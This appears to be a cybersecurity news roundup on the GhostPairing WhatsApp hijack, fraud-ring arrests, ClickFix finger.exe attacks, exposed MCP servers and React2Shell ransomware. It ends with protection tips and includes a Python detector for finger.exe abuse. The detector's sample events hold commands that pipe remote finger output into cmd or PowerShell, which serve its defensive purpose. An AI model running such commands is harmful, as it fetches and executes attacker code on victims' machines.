WhatsApp Account Hijacking: Understanding GhostPairing and Emerging Cybersecurity Threats

WhatsApp Account Hijacking Scheme Headlines Week of Cybersecurity Threats

A sophisticated social engineering technique dubbed "GhostPairing" that hijacks WhatsApp accounts leads this week's roundup of cybersecurity threats, alongside the discovery of exposed AI servers and exploitation of the React2Shell vulnerability in ransomware attacks.

The threat landscape continues to evolve at an accelerated pace as attackers refine old techniques and discover new vulnerabilities in familiar systems. From international scam rings to AI-driven reconnaissance of industrial control systems, this week's developments highlight the fluid nature of cyber threats.

Global Criminal Operations Disrupted

International fraud ring dismantled in Ukraine

Authorities from multiple European countries, including the Czech Republic, Latvia, Lithuania, and Ukraine, have dismantled a criminal network operating call centers that defrauded more than 400 victims across Europe of approximately €10 million ($11.7 million).

The operation targeted call centers in Dnipro, Ivano-Frankivsk, and Kyiv that employed around 100 people who impersonated police officers and bank officials to trick victims into transferring large sums of money or downloading remote access software. Employees received up to 7% of stolen funds as commission, with additional incentives like cars or apartments for those obtaining more than €100,000.

The December 9 operation resulted in 12 arrests and the seizure of cash, 21 vehicles, and various weapons.

India disrupts phishing SMS factory

India's Central Bureau of Investigation (CBI) has dismantled a large-scale cyber fraud operation that sent phishing messages nationwide promoting fake schemes, digital arrest scams, and fraudulent investment opportunities.

The gang, operating from the National Capital Region and Chandigarh area, had acquired approximately 21,000 SIM cards in violation of regulations. These cards were controlled through an online platform to send bulk messages targeting Indian citizens, with even foreign cybercriminals utilizing the service.

"The messages offered fake loans, investment opportunities, and other financial benefits, with the aim of stealing personal and banking details of innocent people," according to the CBI.

In a related operation, the agency charged 17 individuals, including four foreign nationals, and 58 companies involved in a transnational cyber fraud network using Google advertisements, bulk SMS campaigns, and cloud infrastructure to conceal the identities of the perpetrators.

Novel Attack Techniques Emerge

GhostPairing attack targets WhatsApp accounts

A new social engineering technique called GhostPairing is being used to hijack WhatsApp accounts. The attack begins with messages sent from already compromised accounts containing links to what appears to be Facebook content previews.

When victims click these links, they're directed to a fake Facebook viewer page that asks them to verify their identity by scanning a QR code. This code actually links an attacker's browser to the victim's WhatsApp account, granting unauthorized access.

"To abuse this flow, an attacker would open WhatsApp Web in their own browser, capture the QR code shown there, and embed it into the fake Facebook viewer page," explained Gen Digital researchers.

Alternatively, victims are instructed to enter their phone number, which is forwarded to WhatsApp's legitimate "link device via phone number" feature. The generated pairing code is then relayed back to the fraudulent page with instructions for the victim to enter it.

The earliest instances of this attack were detected in Czechia. Users can check for signs of compromise by navigating to Settings > Linked Devices in WhatsApp.

ClickFix attacks leverage legacy Windows tool

A new wave of ClickFix attacks has been using fake CAPTCHA checks to trick users into pasting commands into the Windows Run dialog, which executes the finger.exe tool to retrieve malicious PowerShell code.

The finger command, originally designed to look up information about users on Unix and Linux systems, has been repurposed by attackers to deploy malware. The attacks have been attributed to threat actors tracked as KongTuke and SmartApeSG.

In similar attacks detected by Point Wild, fake browser notifications prompt users to click "How to fix" or copy-paste a PowerShell command that leads to the deployment of DarkGate malware through a malicious HTA file. Organizations seeking protection against these types of threats should consider implementing robust malware removal and prevention solutions as part of their security strategy.
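A detection sketch for the finger.exe pattern described above, written here as an added example (not code from the article or the researchers it cites). It assumes process-creation telemetry already parsed into image, parent image, command line and user fields, as a Sysmon Event ID 1 or EDR feed would provide, and uses constructed sample events rather than real data.

```python
"""Flag finger.exe launched from the Run dialog and piped into an interpreter."""
import re

# Constructed sample process-creation events (field names are assumed).
# The Run dialog launches its child processes under explorer.exe.
SAMPLE_EVENTS = [
    {"image": "C:\\Windows\\System32\\finger.exe",
     "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "finger user@203.0.113.10 | cmd",
     "user": "CORP\\alice"},
    {"image": "C:\\Windows\\System32\\cmd.exe",
     "parent": "C:\\Windows\\explorer.exe",
     "cmdline": 'cmd /c "finger admin@203.0.113.10 | powershell -"',
     "user": "CORP\\bob"},
    {"image": "C:\\Windows\\System32\\finger.exe",
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "finger jsmith@unixbox.corp.example",
     "user": "CORP\\helpdesk"},
    {"image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "firefox.exe",
     "user": "CORP\\alice"},
]

# "finger" or "finger.exe" as a whole token anywhere in the command line.
FINGER_RE = re.compile(r'(?:^|[\s"\\])finger(?:\.exe)?\b', re.IGNORECASE)
# finger output piped straight into a command interpreter.
INTERP_RE = re.compile(r"\|\s*(?:powershell|pwsh|cmd)\b", re.IGNORECASE)
RUN_DIALOG_PARENTS = {"explorer.exe"}


def classify(event):
    """Return 'high', 'medium', 'low' or None for one process-creation event."""
    cmd = event["cmdline"]
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    if not FINGER_RE.search(cmd):
        return None
    reasons = []
    if INTERP_RE.search(cmd):
        reasons.append("finger output piped into an interpreter")
    if parent in RUN_DIALOG_PARENTS:
        reasons.append("launched under explorer.exe (Run dialog)")
    if not reasons:
        return "low"  # finger.exe is rare on Windows; worth a hunt query
    return "high" if len(reasons) == 2 else "medium"


def scan(events):
    """Return (user, severity) for every event that matches."""
    return [(e["user"], classify(e)) for e in events if classify(e)]
```

Both "high" hits here come from the Run dialog pipe chain; the lone "low" hit is a plain finger lookup from a cmd.exe session, which is the benign case to tune against.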

Exposed Infrastructure and Vulnerabilities

Approximately 1,000 MCP servers found exposed

Research from Bitsight has identified roughly 1,000 Model Context Protocol (MCP) servers exposed on the internet with no authorization controls, potentially leaking sensitive data. Some of these exposed servers could allow management of Kubernetes clusters, access to CRM tools, sending of WhatsApp messages, and even remote code execution.

"While Anthropic authored the MCP specification, it's not their job to enforce how every server handles authorization," Bitsight noted. "Because authorization is optional, it's easy to skip it when moving from a demo to a real-world deployment, potentially exposing sensitive tools or data."

To mitigate risks, organizations should avoid exposing MCP servers unnecessarily and implement OAuth protections for authorization. This issue highlights significant security risks and challenges of artificial intelligence in business environments, particularly when deploying new AI technologies without adequate security controls.

React2Shell vulnerability exploited in ransomware attacks

The React2Shell vulnerability (CVE-2025-55182) continues to be widely exploited, with security firm S-RM reporting its use as an initial access vector in a Weaxor ransomware attack on December 5.

"This marks a shift from previously reported exploitation," S-RM stated. "It indicates threat actors whose modus operandi involves cyber extortion are also successfully exploiting this vulnerability, albeit on a much smaller scale and likely in an automated fashion."

Weaxor, believed to be a rebrand of Mallox ransomware, was deployed and executed within less than a minute of initial access, suggesting an automated campaign. According to Palo Alto Networks Unit 42, more than 60 organizations have been impacted by incidents exploiting this vulnerability, while Microsoft reported "several hundred machines across a diverse set of organizations" compromised through React2Shell.

The React2Shell exploit has become increasingly prevalent in cybersecurity incidents, requiring immediate attention from organizations that use React-based applications in their technology stack.

How to protect yourself

These developments underscore the need for enhanced security measures across organizations and individuals alike. To protect yourself:

  1. Regularly verify linked devices in your messaging apps like WhatsApp to identify unauthorized access
  2. Be cautious of links sent even from trusted contacts, as their accounts may be compromised
  3. Never copy-paste commands from unknown sources into command prompts or run dialogs
  4. Ensure all internet-facing servers have proper authorization mechanisms in place
  5. Keep systems and applications updated with the latest security patches to prevent exploitation of vulnerabilities like React2Shell
  6. Enable two-factor authentication (2FA) on all accounts that support it to add an extra layer of security beyond passwords
  7. Educate employees about social engineering tactics and how to recognize phishing attempts

Immediate action is required: Organizations should prioritize patching systems vulnerable to React2Shell and conduct security audits to ensure MCP servers are properly secured behind authentication mechanisms.

The rapid evolution of cyber threats requires constant vigilance and a proactive approach to security. By staying informed about the latest attack techniques and implementing appropriate safeguards, you can significantly reduce your risk of falling victim to these sophisticated schemes.

For comprehensive guidance on protecting against the latest cybersecurity threats, the National Cybersecurity Alliance offers resources for both individuals and organizations to improve their security posture.